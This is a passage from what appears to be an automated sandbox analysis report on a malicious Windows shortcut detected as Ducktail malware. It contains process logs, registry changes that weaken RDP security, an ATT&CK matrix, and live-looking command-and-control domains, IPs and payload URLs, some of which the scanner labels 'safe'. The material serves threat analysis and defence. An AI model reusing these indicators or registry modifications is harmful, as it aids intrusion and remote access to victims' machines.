      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\Temp\svczHost.exeCode function: 18_2_00007FF60711BFE0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,18_2_00007FF60711BFE0
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Lowering of HIPS / PFW / Operating System Security Settings

      barindex
      Modifies security policies related information
      Source: C:\Windows\Temp\myRdpService.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa DisableRestrictedAdmin
      Source: powershell.exe, 00000002.00000002.7096903431.000002BBEA680000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.7094506346.000002BBEA236000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.7100828526.000002C3EB826000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7759299824.000001ECB3DC9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7753000643.000001ECB3D22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
      Source: powershell.exe, 0000000A.00000002.7756997269.000001ECB3D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ramFiles%\Windows Defender\MsMpeng.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntivirusProduct
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntivirusProduct

      Stealing of Sensitive Information

      barindex
      Yara detected Ducktail
      Source: Yara matchFile source: Process Memory Space: svczHost.exe PID: 4540, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Yara detected Ducktail
      Source: Yara matchFile source: Process Memory Space: svczHost.exe PID: 4540, type: MEMORYSTR
      Allows multiple concurrent remote connection
      Source: C:\Windows\Temp\myRdpService.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server fSingleSessionPerUser

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts321
      Windows Management Instrumentation      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		1
      Disable or Modify Tools      		OS Credential Dumping1
      System Time Discovery      		1
      Remote Desktop Protocol      		1
      Archive Collected Data      		3
      Ingress Tool Transfer      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts12
      Command and Scripting Interpreter      		11
      Windows Service      		11
      Windows Service      		2
      Deobfuscate/Decode Files or Information      		LSASS Memory2
      File and Directory Discovery      		Remote Desktop ProtocolData from Removable Media11
      Encrypted Channel      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Service Execution      		Logon Script (Windows)11
      Process Injection      		1
      Obfuscated Files or Information      		Security Account Manager115
      System Information Discovery      		SMB/Windows Admin SharesData from Network Shared Drive11
      Non-Standard Port      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts5
      PowerShell      		Login HookLogin Hook1
      Software Packing      		NTDS441
      Security Software Discovery      		Distributed Component Object ModelInput Capture4
      Non-Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA Secrets11
      Process Discovery      		SSHKeylogging15
      Application Layer Protocol      		Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      File Deletion      		Cached Domain Credentials251
      Virtualization/Sandbox Evasion      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items13
      Masquerading      		DCSync1
      Application Window Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job251
      Virtualization/Sandbox Evasion      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
      Process Injection      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1551875 Sample: eQwUFcwrXk.lnk Startdate: 08/11/2024 Architecture: WINDOWS Score: 100 86 uyt1n8ded9fb380.com 2->86 90 Malicious sample detected (through community Yara rule) 2->90 92 Windows shortcut file (LNK) starts blacklisted processes 2->92 94 Yara detected Ducktail 2->94 96 12 other signatures 2->96 10 cmd.exe 1 2->10         started        13 svczHost.exe 2->13         started        16 myRdpService.exe 2->16         started        19 sppsvc.exe 2->19         started        signatures3 process4 dnsIp5 122 Windows shortcut file (LNK) starts blacklisted processes 10->122 124 Suspicious powershell command line found 10->124 126 Encrypted powershell cmdline option found 10->126 138 2 other signatures 10->138 21 powershell.exe 14 49 10->21         started        26 conhost.exe 1 10->26         started        80 C:\Windows\Temp\myRdpService.exe, PE32+ 13->80 dropped 128 Multi AV Scanner detection for dropped file 13->128 28 powershell.exe 13->28         started        30 cmd.exe 13->30         started        32 cmd.exe 13->32         started        34 7 other processes 13->34 82 206.206.126.252, 49793, 8008 HYPEENT-SJUS United States 16->82 84 23.88.71.29, 49792, 49794, 8000 ENZUINC-US United States 16->84 130 Allows multiple concurrent remote connection 16->130 132 Modifies security policies related information 16->132 134 Reads the Security eventlog 16->134 136 Reads the System eventlog 16->136 file6 signatures7 process8 dnsIp9 88 uyt1n8ded9fb380.com 104.21.86.219, 443, 49764, 49765 CLOUDFLARENETUS United States 21->88 74 C:\Users\user\AppData\...\t1fagedb.cmdline, Unicode 21->74 dropped 108 Windows shortcut file (LNK) starts blacklisted processes 21->108 110 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 21->110 112 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 21->112 116 3 other signatures 21->116 36 cmd.exe 1 21->36         started        39 powershell.exe 5 27 21->39         started        41 csc.exe 3 21->41         started        44 conhost.exe 21->44         started        114 Loading BitLocker PowerShell Module 28->114 46 conhost.exe 28->46         started        48 net.exe 30->48         started        50 3 other processes 30->50 52 2 other processes 32->52 54 8 other processes 34->54 file10 signatures11 process12 file13 98 Windows shortcut file (LNK) starts blacklisted processes 36->98 100 Suspicious powershell command line found 36->100 102 Encrypted powershell cmdline option found 36->102 56 powershell.exe 47 36->56         started        60 conhost.exe 36->60         started        104 Potential dropper URLs found in powershell memory 39->104 106 Loading BitLocker PowerShell Module 39->106 62 conhost.exe 39->62         started        64 WINWORD.EXE 39->64         started        78 C:\Users\user\AppData\Local\...\t1fagedb.dll, PE32 41->78 dropped 66 cvtres.exe 1 41->66         started        68 net1.exe 48->68         started        signatures14 process15 file16 76 C:\Windows\Temp\svczHost.exe, PE32+ 56->76 dropped 118 Potential dropper URLs found in powershell memory 56->118 120 Loading BitLocker PowerShell Module 56->120 70 conhost.exe 56->70         started        72 WmiPrvSE.exe 56->72         started        signatures17 process18

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      eQwUFcwrXk.lnk8%ReversingLabs

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Windows\Temp\svczHost.exe16%ReversingLabsWin64.Malware.Generic

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://html4/loose.dtd0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/4c4ffc93c89dfb9b826b1b24bd745331d0c2aafb3bfb560c0ae79c0e296229154220dabcd48c417e74866081b7c5d20c49a289c543f24eec22cbab522d3402e79738e8af51a6b4c56e1b482bb7c2375dc70d620959fecb0a13db5f7c69a828930bf4d46f7d70cd6f4f8d4a9738b8bcc20%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/StaticFile/TermServiceTryRun/110%Avira URL Cloudsafe
      http://pesterbdd.com/images/Pester.pngXz90%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/e0123bbfddb76d0a721e69812ef33c456abeca67f6a6de3218a4121f769efaecc84cb31c99f6999cbed2bab91692ffe3feecd30f8b6cd30f04af60c8dabe34f74fc256b3f6e52efc3f21eedc161c10335c7fc04619b4334db2e7940d16a99cff437db3b2fa0fb83ecdbd3edcdfa830e90%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321187377204903035f2c6edc84e1877b6a700%Avira URL Cloudsafe
      http://uyt1n8ded9fb380.com0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file3/15c00ea36e9730cbe066155b6df42f28e74ca16ac92a992456106ac76962068b98b8fdbbddfe1fc26714001dac68f55dfde6394439e7568362e53d351476f01a0d0741ebee7cb085677b1764accc0b029f3923b6e1a657607c54dee2db6106bd/Windows%20Defender/16/16/user/2100%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/30bb492ec87899a2b4a8fa5c9eeec469bdf1331e13e733bf21c620f0bb30aac1540%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118a4d29dc2b42a1fdfc3fcf445b5e1ec790%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/StaticFile/RdpService/540%Avira URL Cloudsafe
      http://schemas.ope0%Avira URL Cloudsafe
      http://.jpg0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118ba816f412b881e3aaad6d408d85d04390%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file3/15c00ea36e9730cbe066155b6df42f28e74ca16ac92a992456106ac76962068b980%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/StaticFile/RdpService/54h0%Avira URL Cloudsafe
      http://206.206.126.252:8008/client/ws0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/c0fcfa43a58d04bbdeb124cc853de92c71f413d9845fe6e1a687f68f03777eb45b0%Avira URL Cloudsafe
      http://.css0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/322f9cade6edf27754e99908a3b613cbb2870b90ee66165254085f7c8fc244f7da5e56b571757f523ab1b74f0b2fa31feffd1e9fe8161112e75692567601712fb0e25e562d6b8a48e104a3092fb281311ceea3263b30f8d001611aa592f7120974449bb2c8f98c07211ad54ea73548ef0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/30bb492ec87899a2b4a8fa5c9eeec469bdf1331e13e733bf21c620f0bb30aac1548c78ec9055a01bf495c56498955f53f6c825ee68079bbe4ffef478e9254d76abc75433b29236d6d4ad3a1ad4ad48435e9f0cbebbc164349fd84634f30e15af0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118737720490%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/322f9cade6edf27754e99908a3b613cbb2870b90ee66165254085f7c8fc244f7da0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118eae6d5650%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118eae6d565cd3eb81d1af68992a4aa54ba0%Avira URL Cloudsafe
      https://go.micro0%Avira URL Cloudsafe
      http://pesterbdd.com/images/Pester.png0%Avira URL Cloudsafe
      http://pesterbdd.com/images/Pester.pngh0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/e0123bbfddb76d0a721e69812ef33c456abeca67f6a6de3218a4121f769efaecc80%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/4c4ffc93c89dfb9b826b1b24bd745331d0c2aafb3bfb560c0ae79c0e29622915420%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/71bce99b7502b19ff2a07905ab2d1339c709feba29d711b34cdd49a281e353309644c5163adc6fb4a31548ae03ae3e92419435881eeebe7f4ae1c2626a34d7ec2fa7eb88b6aca77f088cd4d49b095045c28535df70e5ab5d0a2b5b0c8ad3e83b6c86bda9d5d720ef55b509d4734a348e0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118ba816f410%Avira URL Cloudsafe
      http://23.88.71.29:8000/client/ws0%Avira URL Cloudsafe
      http://uyt1n8ded9fb380.com/api/check0%Avira URL Cloudsafe
      http://crl.microsof0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/71bce99b7502b19ff2a07905ab2d1339c709feba29d711b34cdd49a281e35330960%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/JxSkX60%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118a4d29dc20%Avira URL Cloudsafe
      http://crl.mw0%Avira URL Cloudsafe
      http://uyt1n8ded9fb380.com:443/x0%Avira URL Cloudsafe
      https://oneget.org0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      uyt1n8ded9fb380.com
      		104.21.86.219
      		truetrue
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://uyt1n8ded9fb380.com/file2/e0123bbfddb76d0a721e69812ef33c456abeca67f6a6de3218a4121f769efaecc84cb31c99f6999cbed2bab91692ffe3feecd30f8b6cd30f04af60c8dabe34f74fc256b3f6e52efc3f21eedc161c10335c7fc04619b4334db2e7940d16a99cff437db3b2fa0fb83ecdbd3edcdfa830e9false
        • Avira URL Cloud: safe
        		unknown
        https://uyt1n8ded9fb380.com/file3/15c00ea36e9730cbe066155b6df42f28e74ca16ac92a992456106ac76962068b98b8fdbbddfe1fc26714001dac68f55dfde6394439e7568362e53d351476f01a0d0741ebee7cb085677b1764accc0b029f3923b6e1a657607c54dee2db6106bd/Windows%20Defender/16/16/user/210false
        • Avira URL Cloud: safe
        		unknown
        https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321187377204903035f2c6edc84e1877b6a70false
        • Avira URL Cloud: safe
        		unknown
        https://uyt1n8ded9fb380.com/file2/4c4ffc93c89dfb9b826b1b24bd745331d0c2aafb3bfb560c0ae79c0e296229154220dabcd48c417e74866081b7c5d20c49a289c543f24eec22cbab522d3402e79738e8af51a6b4c56e1b482bb7c2375dc70d620959fecb0a13db5f7c69a828930bf4d46f7d70cd6f4f8d4a9738b8bcc2false
        • Avira URL Cloud: safe
        		unknown
        https://uyt1n8ded9fb380.com/StaticFile/TermServiceTryRun/11false
        • Avira URL Cloud: safe
        		unknown
